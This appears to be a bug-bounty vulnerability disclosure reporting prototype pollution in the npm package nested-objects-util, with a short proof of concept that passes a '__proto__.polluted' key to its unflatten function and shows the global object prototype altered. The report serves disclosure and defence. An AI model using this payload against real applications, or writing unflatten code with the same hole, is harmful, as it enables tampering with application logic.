Prototype Pollution in bonnevoyager/nested-objects-util

Valid

Reported on

Dec 21st 2020


Description

nested-objects-util is vulnerable to Prototype Pollution.

Proof of Concept

  1. Create the following PoC file:
// poc.js
var {unflatten} = require("nested-objects-util")
console.log("Before : " + {}.polluted);
unflatten({"__proto__.polluted": "Yes! Its Polluted"})
console.log("After : " + {}.polluted);
  1. Execute the following commands in terminal:
npm i nested-objects-util # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation